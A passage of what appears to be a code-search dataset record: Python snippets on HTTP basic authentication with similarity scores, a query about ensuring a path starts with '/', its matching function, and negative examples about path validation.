"def auth(self, username, password):\n return False", "def authenticate_http(self, f: http.HTTPFlow) -> bool:\n assert self.validator\n username = None\n password = None\n is_valid = False\n\n is_proxy = is_http_proxy(f)\n auth_header = http_auth_header(is_proxy)\n try:\n auth_value = f.request.headers.get(auth_header, \"\")\n scheme, username, password = parse_http_basic_auth(auth_value)\n is_valid = self.validator(username, password)\n except Exception:\n pass\n\n if is_valid:\n f.metadata[\"proxyauth\"] = (username, password)\n del f.request.headers[auth_header]\n return True\n else:\n f.response = make_auth_required_response(is_proxy)\n return False", "def _authenticate(connection: typing.Union[ssl.SSLSocket, socket.socket],\n endpoint: urllib.parse.ParseResult,\n username: str,\n password: str) -> None:\n auth_token = base64.b64encode(b':'.join((username.encode('latin1'), password.encode('latin1'))))\n headers = [\n 'PUT ' + endpoint.path + ' HTTP/1.1',\n 'Host: ' + endpoint.netloc,\n 'Authorization: Basic ' + auth_token.strip().decode('latin1'),\n 'User-Agent: studio',\n 'Accept: */*',\n 'Transfer-Encoding: chunked',\n 'Content-Type: audio/mpeg',\n 'Ice-Public: 1',\n 'Ice-Name: Radio stream',\n 'Ice-Description: Stream from the radio studio',\n 'Expect: 100-continue',\n '',\n ''\n ]\n connection.send('\\r\\n'.join(headers).encode('latin1'))", "def login(self):\n req_url = 'http://{}:{}/api/'.format(self.server, self.port)\n return requests.head(\n req_url,\n auth=requests.auth.HTTPBasicAuth(self.username, self.password)\n )", "def authenticate(self):\n return Response(\n 'Could not verify your access level for that URL.\\nYou have to login with proper credentials',\n 401,\n {'WWW-Authenticate': 'Basic realm=\"Login Required\"'}\n )", "def request_authentication(user: str, password: str) -> bool:\n # request URL using GET method adding authorization header\n response = requests.get(url=\"https://httpbin.org/basic-auth/correlaid/password\",\n auth=(user, password))\n # parse response\n parsed_response = response.json()\n # return authenticated key\n return parsed_response[\"authenticated\"]", "def authenticate(self, username: str, password: str) -> Optional[str]:", "def authenticate(self, username: str, password: str) -> Optional[str]:", "def user_must_authenticate():\n return Response(\n 'Could not verify your access level for that URL.\\n'\n 'You have to login with proper credentials', 401,\n {'WWW-Authenticate': 'Basic realm=\"Login Required\"'})", "def authenticate():\n return Response(\n 'Could not verify your access level for that URL, need token.\\n', 403,\n {'WWW-Authenticate': 'Basic realm=\"token Required\"'})", "def authenticate(self, request):\n return None", "def get_webpage_with_auth(url, username, password, logger):\n try:\n response = requests.get(url, auth=HTTPBasicAuth(username, password))\n return response.content\n except requests.exceptions.SSLError as e:\n logger.error('SSL error occurred while trying to retrieve {}\\nGot error: {}'.format(url, e))\n except requests.exceptions.BaseHTTPError as e:\n logger.error('HTTP error occurred while trying to retrieve {}\\nGot error: {}'.format(url, e))\n except Exception as e:\n logger.error('Unknown error occurred while trying to retrieve {}\\nError msg: {}'.format(url, e))", "def _login(self, username, password):\n\n auth_token_header_name = \"X-AuthToken\"\n if auth_token_header_name not in self.headers:\n login_response = self._send(\"/auth/login\", \"POST\", {\n \"username\": username,\n \"password\": password\n })\n try:\n auth_token = login_response.json()[\"authToken\"]\n except KeyError:\n raise AuthorizationError()\n auth_header = {auth_token_header_name: auth_token}\n self.headers.update(auth_header)", "def _auth():\n with open('api-credentials.txt', 'r') as f:\n lines = f.read().splitlines()\n credentials = lines[0] + ':' + lines[1]\n return 'Basic ' + base64.b64encode(credentials.encode()).decode()", "def authenticate(self, username, password):\n auth = (username, password)\n res = requests.get(\n self.normalize_admin_url(\"authenticate\"),\n headers={\"user-agent\": self.u_agent},\n auth=auth,\n verify=False,\n )\n if res.status_code == 200:\n # authentication ok, keep authentication info for future use\n self.auth = auth\n return Response(0, \"Successfully logged in\")\n elif res.status_code == 401:\n try:\n val = res.json()\n except ValueError:\n val = \"Login credentials not accepted\"\n return Response(401, val)\n else:\n return Response(res.status_code, res.content)", "def __init__(__self__, *,\n auth_type: pulumi.Input[str],\n username: pulumi.Input[str],\n ca_cert_resource_id: Optional[pulumi.Input[str]] = None,\n password: Optional[pulumi.Input[str]] = None):\n pulumi.set(__self__, \"auth_type\", 'BasicAuth')\n pulumi.set(__self__, \"username\", username)\n if ca_cert_resource_id is not None:\n pulumi.set(__self__, \"ca_cert_resource_id\", ca_cert_resource_id)\n if password is not None:\n pulumi.set(__self__, \"password\", password)", "def authenticate(self):\n abort(\n 401,\n description=self.exception,\n www_authenticate=(\"WWW-Authenticate\", 'Basic realm=\"%s\"' % __package__),\n )", "def open_https(self, url, data=None, ssl_context=None):\n # type: (AnyStr, Optional[bytes], Optional[SSL.Context]) -> addinfourl\n if ssl_context is not None and isinstance(ssl_context, SSL.Context):\n self.ctx = ssl_context\n else:\n self.ctx = SSL.Context()\n user_passwd = None\n if isinstance(url, six.string_types):\n try: # python 2\n # http://pydoc.org/2.5.1/urllib.html\n host, selector = splithost(url)\n if host:\n user_passwd, host = splituser(host)\n host = unquote(host)\n realhost = host\n except NameError: # python 3 has no splithost\n # https://docs.python.org/3/library/urllib.parse.html\n parsed = urlparse(url)\n host = parsed.hostname\n if parsed.port:\n host += \":{0}\".format(parsed.port)\n user_passwd = parsed.username\n if parsed.password:\n user_passwd += \":{0}\".format(parsed.password)\n selector = parsed.path\n else:\n host, selector = url\n urltype, rest = splittype(selector)\n url = rest\n user_passwd = None\n if urltype.lower() != 'http':\n realhost = None\n else:\n try: # python 2\n realhost, rest = splithost(rest)\n if realhost:\n user_passwd, realhost = splituser(realhost)\n if user_passwd:\n selector = \"%s://%s%s\" % (urltype, realhost, rest)\n except NameError: # python 3 has no splithost\n parsed = urlparse(rest)\n host = parsed.hostname\n if parsed.port:\n host += \":{0}\".format(parsed.port)\n user_passwd = parsed.username\n if parsed.password:\n user_passwd += \":{0}\".format(parsed.password)\n # print(\"proxy via http:\", host, selector)\n if not host:\n raise IOError('http error', 'no host given')\n if user_passwd:\n import base64\n auth = base64.encodestring(user_passwd).strip()\n else:\n auth = None\n # Start here!\n h = httpslib.HTTPSConnection(host=host, ssl_context=self.ctx)\n # h.set_debuglevel(1)\n # Stop here!\n if data is not None:\n h.putrequest('POST', selector)\n h.putheader('Content-type', 'application/x-www-form-urlencoded')\n h.putheader('Content-length', '%d' % len(data))\n else:\n h.putrequest('GET', selector)\n if auth:\n h.putheader('Authorization', 'Basic %s' % auth)\n for args in self.addheaders:\n h.putheader(*args) # for python3 - used to use apply\n h.endheaders()\n if data is not None:\n h.send(data + '\\r\\n')\n # Here again!\n resp = h.getresponse()\n fp = resp.fp\n return addinfourl(fp, resp.msg, \"https:\" + url)\n # Stop again.", "def set_headers(username, password):\n REQUESTS_HEADERS[\"username\"] = username\n REQUESTS_HEADERS[\"password\"] = password\n REQUESTS_HEADERS[\"Content-Type\"] = \"application/json\"", "def check_auth(username, password):\n return basic_login(username, password)", "def authenticate():\n return abort(401)", "def authenticate(request=None, **credentials):\n print request, credentials", "def auth(username='', pw='', session=''):\n if (len(username) > 0 and len(pw) > 0) or len(session) > 0:\n url = wwl.server(secure=True)\n f = dict()\n if len(username) > 0:\n f['username']=username\n f['pw']=pw\n else:\n f['session']=session\n form_data = urllib.urlencode(f)\n url = wwl.server() + '/users/auth'\n result = urllib2.urlopen(url, form_data)\n tt = result.read()\n return tt\n else:\n return ''", "def __init__(self, url, username, password):\n self.session = requests.session()\n self.session.auth = (username, password)\n self.session.headers.update({\n 'Accept': JSON_CONTENT_TYPE,\n })\n self.url = url", "def authenticate(self, uri):\n return self.username, self.password", "def __auth(username, password, type=\"basic\"): # pylint:disable=redefined-builtin\n # TODO: Handle encrypted passwords.\n if type.lower() == \"basic\":\n return HTTPBasicAuth(username, password)\n return HTTPDigestAuth(username, password)", "def authorize(username, password):\n\ts = '%s:%s' % (username, password)\n\tPAYLOAD_HEADERS['Authorization'] = b'Basic ' + base64.b64encode(s.encode('ascii'))", "def __init__(__self__, *,\n password: pulumi.Input[str],\n server: pulumi.Input[str],\n type: pulumi.Input[str],\n username: pulumi.Input[str]):\n pulumi.set(__self__, \"password\", password)\n pulumi.set(__self__, \"server\", server)\n pulumi.set(__self__, \"type\", 'BasicAuth')\n pulumi.set(__self__, \"username\", username)", "def authenticate(self, headers):\n try:\n from base64 import b64decode\n (basic, _, encoded) = headers.get('Authorization').partition(' ')\n assert basic == 'Basic', 'Only basic authentication supported'\n encodedByteString = encoded.encode()\n decodedBytes = b64decode(encodedByteString)\n decodedString = decodedBytes.decode()\n (username, _, password) = decodedString.partition(':')\n return (username == XMLRPC_SERVER_USER and password == XMLRPC_SERVER_PASSWORD)\n except:\n return False", "def get_authenticate_header(self):\n return f'Basic realm=\"{self.www_authenticate_realm}\"'", "def basic_http_auth(f):\n def wrap(request, *args, **kwargs):\n if request.META.get('HTTP_AUTHORIZATION', False):\n authtype, auth = request.META['HTTP_AUTHORIZATION'].split(' ')\n auth = base64.b64decode(auth)\n username, password = auth.split(':')\n user = authenticate(username=username, password=password)\n if user is not None:\n if user.is_active:\n login(request, user)\n return f(request, *args, **kwargs)\n else:\n r = HttpResponse(\"Auth Required\", status = 401)\n r['WWW-Authenticate'] = 'Basic realm=\"ThatPanda DDNS\"'\n return r\n r = HttpResponse(\"Auth Required\", status = 401)\n r['WWW-Authenticate'] = 'Basic realm=\"ThatPanda DDNS\"'\n return r\n \n return wrap", "def __init__(self, user, password, host='localhost', port=22555,\n use_https=False):\n url = 'http{s}://{user}:{password}@{host}:{port}/'.format(\n s='s' if use_https else '',\n user=user, password=password, host=host, port=port)\n self.url = url\n self.proxy = AuthServiceProxy(url, exception_wrapper=wrap_exception)", "def __init__(self, host, username, password, is_ssl=False, retries=None):\r\n self.host = host\r\n self.username = username\r\n self.password = password\r\n self.is_ssl = self.is_true(is_ssl)\r\n self.retries = retries", "def authenticate_credentials(self, **credentials):\n return None", "def basic_auth(\n monkeypatch: pytest.MonkeyPatch,\n username: str = \"test_user\",\n password: str = \"r4ndom_bUt_memorable\",\n) -> tuple:\n monkeypatch.setenv(\"BASIC_AUTH_USERNAME\", username)\n monkeypatch.setenv(\"BASIC_AUTH_PASSWORD\", password)\n assert os.getenv(\"BASIC_AUTH_USERNAME\") == username\n assert os.getenv(\"BASIC_AUTH_PASSWORD\") == password\n return username, password", "def add_auth(self, http_request):\r\n pass", "def authenticate(self):\n self.connection.authenticate()", "def __init__(self):\n self.__client = Client(verify_ssl_cert=True)\n self.__headers = {'Content-Type': 'application/json'}\n self.login()", "def add_basic_auth(blueprint: Blueprint, username, password, realm='api'):\n\n @blueprint.before_request\n def basic_http_auth(*args, **kwargs):\n auth = request.authorization\n if auth is None or auth.password != password or auth.username != username:\n return Response('Please login', 401, {'WWW-Authenticate': f'Basic realm=\"{realm}\"'})", "def _auth_remoteloadjson(user: str, passwd: str) -> None:\n auth = base64.b64encode(f\"{user}:{passwd}\".encode())\n opener = request.build_opener()\n opener.addheaders = [(\"Authorization\", f\"Basic {auth.decode()}\")]\n request.install_opener(opener)", "async def authenticate(self, request: Request):\n\n pass", "def login(host, port, username, password):\n\n headers = {'X-Csrf-Token': '1'}\n host = \"https://{}:{}\".format(host, port)\n url = urlparse.urljoin(host, AUTH_PATH)\n auth = requests.auth.HTTPBasicAuth(username, password)\n\n response = requests.get(url, verify=False, headers=headers, auth=auth)\n\n parsed_url = urlparse.urlparse(response.url)\n token_frags = parsed_url.fragment.split('&')\n token_pieces = {m.split('=')[0]: m.split('=')[1] for m in token_frags}\n token = token_pieces['access_token']\n\n return token", "def _http_request(self, req):\n if self._username and self._password:\n base64string = base64.encodestring('%s:%s' % (self._username, self._password))[:-1]\n req.add_header(\"Authorization\", \"Basic %s\" % base64string)\n\n try:\n return urllib2.urlopen(req).read()\n except urllib2.URLError, e:\n clsname = self.__class__.__name__\n name = clsname.replace('MediaBackend', '')\n \n self.log.warning(\"Couldn't connect to %s at %s, are you sure it's running?\", name, self.host_string())\n return None", "def authenticate(self):\n resp = Response(None, 401)\n abort(401, description='Please provide proper credentials', response=resp)" ]
[ "0.68551093", "0.6853429", "0.6646717", "0.66217005", "0.6620933", "0.66114116", "0.66114116", "0.66114116", "0.66114116", "0.66114116", "0.66114116", "0.66114116", "0.66114116", "0.66114116", "0.66114116", "0.66114116", "0.66114116", "0.66114116", "0.66114116", "0.66114116", "0.66114116", "0.66114116", "0.66114116", "0.66114116", "0.66114116", "0.66114116", "0.65910184", "0.6568698", "0.65364164", "0.65364164", "0.65364164", "0.65364164", "0.65364164", "0.65364164", "0.65364164", "0.65364164", "0.6531353", "0.652657", "0.6513777", "0.6502004", "0.6492069", "0.6468011", "0.6442731", "0.6405746", "0.6397832", "0.63894904", "0.6377314", "0.63749427", "0.6343895", "0.6314837", "0.6313272", "0.63083977", "0.62936795", "0.62704974", "0.626705", "0.6263158", "0.6254442", "0.62493896", "0.62470317", "0.6230606", "0.6220748", "0.62109834", "0.6201165", "0.6201165", "0.61974114", "0.6191178", "0.6181394", "0.6174796", "0.61542434", "0.61297363", "0.6116546", "0.6112256", "0.6112166", "0.6095658", "0.60925835", "0.60867", "0.60698867", "0.60393465", "0.60216224", "0.5998636", "0.5997593", "0.5992796", "0.5991736", "0.5983919", "0.5975483", "0.5965089", "0.5946033", "0.59406704", "0.5930144", "0.5927415", "0.59150356", "0.59095293", "0.5903892", "0.5893015", "0.5889784", "0.58860594", "0.5885239", "0.58778447", "0.5877236", "0.58764845" ]
0.5987323
83
Ensures that the path starts with a '/'
def ensure_path(self, page): return page if page.startswith('/') else "/{0}".format(page)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def validate_short_path(short_path):", "def test_normalize_path(self):\n self.assertEqual(normalize_path(\"//////\"), \"/\")\n self.assertEqual(normalize_path(\"//\"), \"/\")\n self.assertEqual(normalize_path(\"//foo/bar//baz\"), \"/foo/bar/baz\")\n self.assertEqual(normalize_path(\"//foo/bar//baz/\"), \"/foo/bar/baz/\")\n self.assertEqual(normalize_path(\"//f%20oo/bar\"), \"/f oo/bar\")", "def path_validate(path):\n # functionality to be added later\n return path", "def validate_path(self, path):\n return True # Allow anything in path, even spaces\n # pattern = r'(/?[a-zA-Z_][a-zA-Z0-9_]*)+$' # require start with letter\n # pattern = r'(/?[a-zA-Z0-9_]*)+$' # allow start with number\n pattern = r'^([^ ]+)$' # allow anything except spaces\n if path == '' or re.match(pattern, path):\n return\n raise ValueError(\"Invalid path (spaces not allowed):\\n'%s'\" % path)", "def leadingSlash(path):\n if path == None or len(path) == 0 or path == '/':\n return '/'\n if path[0] == '/':\n return path\n else:\n return '/' + path", "def starts_slash(url):\n return url if url.startswith(\"/\") else \"/\" + url", "def validpath(self, path):\n root = self.realpath(self.root)\n path = self.realpath(path)\n if not self.root.endswith(os.sep):\n root = self.root + os.sep\n if not path.endswith(os.sep):\n path = path + os.sep\n if path[0:len(root)] == root:\n return True\n return False", "def _is_bad_path(path, base):\r\n return not resolved(joinpath(base, path)).startswith(base)", "def ensure_slash(text):\n if text.startswith('/'):\n return text\n return '/' + text", "def matches_path(cls, path):\n return path.startswith('/') or \\\n path.startswith('./') or \\\n path.startswith('../') or \\\n path.startswith('file://')", "def ValidatePath(self, root_path: str) -> bool:\n if 'silver' in root_path:\n return True\n\n return False", "def ValidatePath(self, root_path: str) -> bool:\n if 'gold' in root_path:\n return True\n\n return False", "def is_path(self, s):\n return True", "def test_predicates_on_unsanitized_paths(self):\n self.mfs.add_entries({'/just/another/pythonista': ''})\n\n self.assertTrue(os.path.isdir('///just'))\n self.assertTrue(os.path.isdir('///just/////another'))\n self.assertTrue(os.path.exists('///just////another////////pythonista'))\n self.assertTrue(os.path.isfile('///just////another////////pythonista'))", "def _normalize_path(path):\n if path is None:\n directory = BASE_PATH\n path = ''\n else:\n path = op.normpath(path)\n directory = op.normpath(op.join(BASE_PATH, path))\n\n if not is_in_folder(BASE_PATH, directory):\n abort(404)\n\n if not op.exists(directory):\n abort(404)\n\n return BASE_PATH, directory, path", "def test_invalid_pathname(self):\n self.assertFalse(Util.is_pathname_valid(''))", "def _get_full_path(self, path, environ):\n if path.startswith('//'):\n path = path[1:]\n elif path.startswith('/'):\n path = environ.get('SCRIPT_NAME', '') + path\n return path", "def standardize_path(path):\n path.rstrip('/')\n if not path.startswith('.*'):\n path = '/' + path\n path = re.compile('/+').sub('/', path)\n return path", "def dir_path(path):\n pattern='^(.*)[/]$'\n matchobj=re.match(pattern,path)\n if matchobj:\n return path\n else:\n return path+'/'", "def check_path(self, path):\n if path in self.app_path:\n return True\n else:\n return False", "def normalizePath(path):\n if path == None or len(path) == 0 or path == '/':\n return '/'\n buff = '/' + path if path[0] != '/' else path\n return buff.replace('//', '/')", "def validateObjectPath(p):\n if not p.startswith('/'):\n raise MarshallingError('Object paths must begin with a \"/\"')\n if len(p) > 1 and p[-1] == '/':\n raise MarshallingError('Object paths may not end with \"/\"')\n if '//' in p:\n raise MarshallingError('\"//\" is not allowed in object paths\"')\n if invalid_obj_path_re.search(p):\n raise MarshallingError('Invalid characters contained in object path')", "def validate_safe_path(value):\n base = \"/input/\"\n\n try:\n new_path = safe_join(base, value)\n except SuspiciousFileOperation:\n raise ValidationError(\"Relative paths are not allowed.\")\n\n valid_path = new_path[len(base) :]\n\n if value != valid_path:\n raise ValidationError(f\"Invalid file path, should be {valid_path}.\")", "def ensure_path(path):\n\n path = os.path.expanduser(path)\n #Do not take into consideration the last path element\n #Unless it end with '/'\n os.makedirs('/'.join(path.split('/')[:-1]), exist_ok=True)\n return path", "def test_path(self):\n self.assertEqual(self.ftp_case.path, '/rfc/rfc1808.txt')\n self.assertEqual(self.ldap_case.path, '/c=GB')\n self.assertEqual(self.news_case.path, \n 'comp.infosystems.www.servers.unix')\n self.assertEqual(self.telnet_case.path, '/')\n self.assertEqual(self.urn_case.path, \n 'oasis:names:specification:docbook:dtd:xml:4.1.2')", "def validate(self, uri_path, fs_path):\n if not os.path.exists(fs_path):\n raise Response(404)\n elif os.path.isdir(fs_path) and not uri_path.endswith('/'):\n new_location = '%s/' % uri_path\n response = Response(301)\n response.headers['Location'] = new_location\n raise response\n return fs_path", "def chkPath(fullPath: str) -> None:\n\n # Check if path already exist.\n p = os.path.split(fullPath)\n exists = os.path.exists(p[0])\n # If not then create it.\n if exists == False:\n try:\n os.makedirs(p[0])\n except:\n print(\"Failed to create requested path.\")", "def valid_path(s):\n if len(s) > 0:\n return s\n else:\n raise argparse.ArgumentTypeError('path cannot be empty')", "def name_check(dirname):\r\n\tif dirname[-1] == \" \":\r\n\t\tdirname = dirname[:-1]\r\n\tif dirname[-1] != \"/\":\r\n\t\tdirname += \"/\"\r\n\treturn dirname", "def ensureOneSlash(s):\n\treturn s.rstrip(\"/\")+\"/\"", "def test_remove_extra_slash():\n # TODO: Should we actually do this?\n # TODO: See https://webmasters.stackexchange.com/questions/8354/what-does-the-double-slash-mean-in-urls/8381#8381\n assert (normalize_url(\"http://www.example.com/foo//bar.html\") ==\n \"http://www.example.com/foo/bar.html\")\n assert(normalize_url(\"http://example.com///abc\") ==\n \"http://example.com/abc\")", "def check_valid_path(path):\n\n path = os.path.normpath(path)\n if not os.path.exists(path):\n print(f\"{path} doesn't exist\")\n print('Code execution exit')\n sys.exit()", "def validated_path(basepath, env = None, *path):\n if basepath is not None:\n result = os.path.realpath(os.path.join(os.path.expanduser(basepath), *path))\n\n if env is not None and not os.path.isdir(result):\n env.warn(result + ' not found.')\n\n return result\n else:\n raise ValueError", "def verify_root_path(self) -> None:\n path = \"/\"\n with self.assertRaises(AccessDeniedException):\n verify_file_path(path)", "def test_path(self):\n urlpath = url.URL.fromString(\"http://example.com/foo/bar?baz=quux#foobar\")\n self.assertEqual(urlpath.path, \"foo/bar\")\n urlpath = url.URL.fromString(\"http://example.com/foo%2Fbar?baz=quux#foobar\")\n self.assertEqual(urlpath.path, \"foo%2Fbar\")\n urlpath = url.URL.fromString(\"http://example.com/-_.!*'()?baz=quux#foo\")\n self.assertEqual(urlpath.path, \"-_.!*'()\")", "def test_expand_path_1(self):\n partial_path = \"/fake/path\"\n input_path = \"~\" + partial_path\n expanded_path = basic.expand_path(input_path)\n home_dir = Path(\"~\").expanduser()\n expected_path = str(home_dir) + partial_path\n self.assertEqual(expanded_path, expected_path)", "def check_path(path):\n _base_path = \"build://project/\"\n all_ctx = path.replace(_base_path, \"\").split(\"/\")\n new_path = _base_path\n\n for ctx in all_ctx:\n new_path += (\"/\" + ctx)\n print(new_path)\n create_context(new_path)", "def startswith(self, base):\n if self.path_is_string:\n return self.path.startswith(base)\n if not self.path:\n return not bool(base)\n if self.path_type is list and len(self.path) is 1:\n return self.path[0].startswith(base)\n return self.joined().startswith(base)", "def normdirpath(path):\n if not path.endswith('/') and path != '':\n path += '/'\n return path", "def make_full_path(self, path, name):\n full_path = (path + \"/\" + name) if path != '' else name\n # remove any duplicate slashes\n full_path = re.sub(r'//+',r'/', full_path)\n self.validate_path(full_path)\n return full_path", "def test_valid_pathname(self):\n self.assertTrue(Util.is_pathname_valid('./myrandomvalidfilename.dat'))\n self.assertTrue(Util.is_pathname_valid('myrandomvalidfilename.dat'))", "def verify_restricted_path(self) -> None:\n path = \"/usr\"\n with self.assertRaises(NotFoundException):\n verify_file_path(path)", "def test_parse_url_path() -> None:\n assert indieauth._parse_url(\"http://ex.com\").path == \"/\"", "def test_sha1_from_path(self):\n self.assertEqual(TEST_SHA1, _get_sha1_from_path(TEST_SHA1))\n self.assertEqual(TEST_SHA1, _get_sha1_from_path('/' + TEST_SHA1))\n self.assertEqual(TEST_SHA1, _get_sha1_from_path('/test/' + TEST_SHA1))", "def test_verify_path_7(self):\n result = basic.verify_path(str(self.test_directory1), \"invalid\")\n self.assertFalse(result)", "def _check_filepath(self, filepath: str) -> None:\n base_dir = utils.vfs_construct_path('/', self.assets_path, 'assets')\n absolute_path = utils.vfs_construct_path(base_dir, filepath)\n normalized_path = utils.vfs_normpath(absolute_path)\n\n # This check prevents directory traversal.\n if not normalized_path.startswith(base_dir):\n raise IOError('Invalid filepath: %s' % filepath)", "def _sanitize_relative_path(self, path):\n last = None\n path = os.path.normpath(path)\n while path != last:\n last = path\n # Note: os.path.join treats '/' as os.sep on Windows\n path = path.lstrip(os.sep).lstrip('/')\n path = path.lstrip(os.pardir).lstrip('..')\n drive, path = os.path.splitdrive(path) # for Windows\n return path", "def clean_path(path):\n path = path.replace(\"~\", str(Path.home()))\n if path[-1] != \"/\":\n path += \"/\"\n return path", "def win_path_check(path):\n if IS_WIN:\n return path.replace(\"\\\\\", \"/\").replace(\":\", \"\\\\:\")\n return path", "def is_posix_path(my_path: str) -> bool:\n return \"/\" in str(my_path)", "def is_valid_path(input_path):\n if not os.path.exists(input_path):\n print('\\'{}\\' is not a valid path.'.format(input_path))\n exit(1)\n return input_path", "def verify_path(path):\n if path is None:\n sys.exit('Program terminated. You must specify a correct path.')\n path = Path(path)\n assert path.exists(), f'The specified path was not found: {path}.'\n return path", "def test_append_slash():\n assert normalize_url(\"http://example.com\") == \"http://example.com/\"", "def test_verify_path_6(self):\n result = basic.verify_path(str(self.test_directory1) + \"abcxyz\")\n self.assertFalse(result)", "def filesystem_path(domain, path):\n base = os.path.join(app.config['SITES_DIR'], domain) + '/'\n full = os.path.abspath(os.path.join(base, path))\n if not full.startswith(base) and base != full + '/':\n raise SecurityError(\"{0} is not in {1}\".format(full, base))\n return full", "def is_absolute_url(path):\n return path.startswith(\"http\")", "def test_expand_path_3(self):\n partial_path = \"/fake/path\"\n input_path = \".\" + partial_path\n expanded_path = basic.expand_path(input_path)\n local_path = Path(\".\").resolve()\n expected_path = str(local_path) + partial_path\n self.assertEqual(expanded_path, expected_path)", "def test_append_slash_have_slash(self):\n request = self.rf.get(\"/slash/\")\n self.assertIsNone(CommonMiddleware(get_response_404).process_request(request))\n self.assertEqual(CommonMiddleware(get_response_404)(request).status_code, 404)", "def test_expand_path_2(self):\n input_path = \"/fake/path\"\n expanded_path = basic.expand_path(input_path)\n expected_path = input_path\n self.assertEqual(expanded_path, expected_path)", "def prepare(self):\n if not self._base:\n self.error = \"path= must be specified\"\n return False\n if self._volume:\n if \"://\" not in self._volume:\n self.error = \"mount= can only be an URL\"\n return False\n if self._base.startswith(\"/\"):\n self._base = os.path.join(self._volume, self._base[1:])\n # do the prefix check anyway, for sanity\n if not is_parent_of(self._volume, self._base):\n self.error = \"mount= must be a prefix of path=\"\n return False\n return True", "def __post_init__(self) -> None:\n if self.is_directory and not self.path.endswith('/'):\n self.path += '/'", "def _validate_path(self, key, path):\n if path is None:\n raise TypeError(\"FileLink.path can not be None\")\n \n if not isinstance(path, (str, unicode)):\n raise TypeError(\"FileLink.path should be a str or unicode, \"\n \"not %s\" % path.__class__.__name__)\n return path", "def rpath(path):\n if path.startswith('/'):\n path = path[1:]\n return path", "def _check_filename(self, filename):\n if len(os.path.dirname(filename)) != 0:\n raise ValueError(f\"Expecting file name but got path {filename}\")", "def _trim_path(path):\n if path.endswith(\"/\"):\n path = path[:-1] # remove / at the end\n \n return path", "def is_posix_path3(my_path):\n return \"/\" in str(my_path)", "def guard(path):\n parts = list(path.parts)\n return guard_from_parts(parts[1:])", "def test_verify_path_4(self):\n result = basic.verify_path(str(self.test_directory1) + \"abcxyz\", \"dir\")\n self.assertFalse(result)", "def default_path(path):\r\n while path[len(path) - 1] == '/' or path[len(path) - 1] == '\\\\':\r\n path = path[0:-1]\r\n\r\n return path", "def _validate_path(self, path: str, is_file: bool) -> bool:\n is_valid_path = True\n if is_file and not os.path.isfile(path):\n is_valid_path = False\n elif not is_file and not os.path.isdir(path):\n is_valid_path = False\n if is_valid_path:\n logging.info('github_source_interceptor: Located path: ' + path)\n else:\n logging.error('github_source_interceptor: Could not locate path: ' + path)\n\n return is_valid_path", "def is_posix_path2(my_path):\n return \"/\" in str(my_path)", "def ends_with_slash_validator(string: str) -> None:\n if not string.endswith(\"/\"):\n raise ValidationError(\"The entered URL must end with a slash.\")", "def as_base(path):\n path = path if path.startswith('/') else '/' + path\n return path if path.endswith('/') else path + '/'", "def test_bad_paths(self):\n self.do_test_bad_path('frog', '/frog') # no permission to write", "def fix_path(self):\n paths = self.data['path'].tolist()\n prefixes = [re.findall(r'[A-Z\\-0-9]+', path) for path in paths]\n prefix_good = [str(prefix[0]) + \".json\" for prefix in prefixes]\n self.data['path'] = prefix_good", "def noTrailingSlash(path):\n return path.split('/')[0]", "def clean_path(self, path):\n if('.flaccuesplit.' in path):\n path, flaccue_details = path.split('.flaccuesplit.')\n if(path.startswith(self.mount)):\n # Strip off the mount point.\n path = path[len(self.mount):]\n return path", "def _path_parts(path):\n # clean it up. this removes duplicate '/' characters and any that may\n # exist at the front or end of the path.\n return [pp for pp in path.split(\"/\") if pp]", "def format_path(path):\n return path if path.endswith('/') else path + '/'", "def test_verify_path_5(self):\n result = basic.verify_path(str(self.test_directory1))\n self.assertTrue(result)", "def clean_path(path):\n return resolved_path(path)", "def validate_path(path, allow_whitespace=False,\n invalid_chars=[\":\", \"/\", \"\\\\\", \"*\", \"?\", \".\", \"%\", \"$\"]):\n if not allow_whitespace:\n from string import whitespace\n for char in whitespace:\n if char in path:\n raise Exception(\"Cannot contain whitespace.\")\n\n for char in invalid_chars:\n if char in path:\n raise Exception(\n \"Cannot contain {}.\".format(invalid_chars)\n )\n\n return path", "def test_client_id_path() -> None:\n assert indieauth._parse_client_id(\"http://ex.com\").path == \"/\"\n assert indieauth._parse_client_id(\"http://ex.com/hello\").path == \"/hello\"\n assert (\n indieauth._parse_client_id(\"http://ex.com/hello/.world\").path == \"/hello/.world\"\n )\n assert (\n indieauth._parse_client_id(\"http://ex.com/hello./.world\").path\n == \"/hello./.world\"\n )\n\n with pytest.raises(ValueError):\n indieauth._parse_client_id(\"http://ex.com/.\")\n\n with pytest.raises(ValueError):\n indieauth._parse_client_id(\"http://ex.com/hello/./yo\")\n\n with pytest.raises(ValueError):\n indieauth._parse_client_id(\"http://ex.com/hello/../yo\")", "def _NormalizePath(path: str) -> str:\n components = path.split(\"/\")\n normalized_components = [\n _NormalizePathComponent(component) for component in components\n ]\n if (normalized_components[1] == \"api\" and\n (len(normalized_components) == 2 or normalized_components[2] != \"v2\")):\n # We describe the v2 API in the OpenAPI description.\n normalized_components.insert(2, \"v2\")\n\n normalized_path = \"/\".join(normalized_components)\n if not normalized_path.startswith(\"/\"):\n normalized_path = \"/\" + normalized_path\n\n return normalized_path", "def verify_file_path(self) -> None:\n path = \"/data\"\n verify_file_path(path)", "def test_append_slash_disabled(self):\n request = self.rf.get(\"/slash\")\n self.assertEqual(CommonMiddleware(get_response_404)(request).status_code, 404)", "def ismount(path):\n return True if not get_instance(path).relpath(path) else False", "def validate_path(validation_context, path):\n\n return _validate_path(validation_context, path)", "def check_path(p, cwd):\n if not path.isabs(p):\n p = path.normpath(path.join(cwd,p))\n return p", "def test_empty(self):\n self.assertFalse(os.path.exists('/'))", "def qualify(path: str) -> str:\n if path.startswith(\"/\"):\n return f\"file://{path}\"\n else:\n return path", "def is_absolute_path(path: str) -> bool:\n # This is a rather weak test, may be enhanced if desired\n return \"//\" in path \\\n or \":\" in path \\\n or path.startswith(\"/\")", "def is_valid_path(path):\n if not os.path.exists(path):\n raise IOError(\"{path} is not a valid path\".format(path=path))\n if not os.access(path, os.R_OK):\n raise OSError(\"{path} is not a readable path\".format(path=path))", "def _normalize_path(path):\n\n i = 0\n for c in path:\n if c != \"/\":\n break\n i = i + 1\n\n if i:\n return path[(i - 1) :]\n\n return path", "def path_only(self):\n path = six.moves.urllib.parse.urlparse(self.path).path\n if path.endswith('/'):\n return path[:-1]\n else:\n return path", "def test_verify_path_1(self):\n result = basic.verify_path(self.test_filepath1, \"file\")\n self.assertTrue(result)", "def __clean_path(self, path):\n matches = re.finditer(r'\\%\\(.*?\\)[diouxXeEfFgGcrsa]', path)\n for 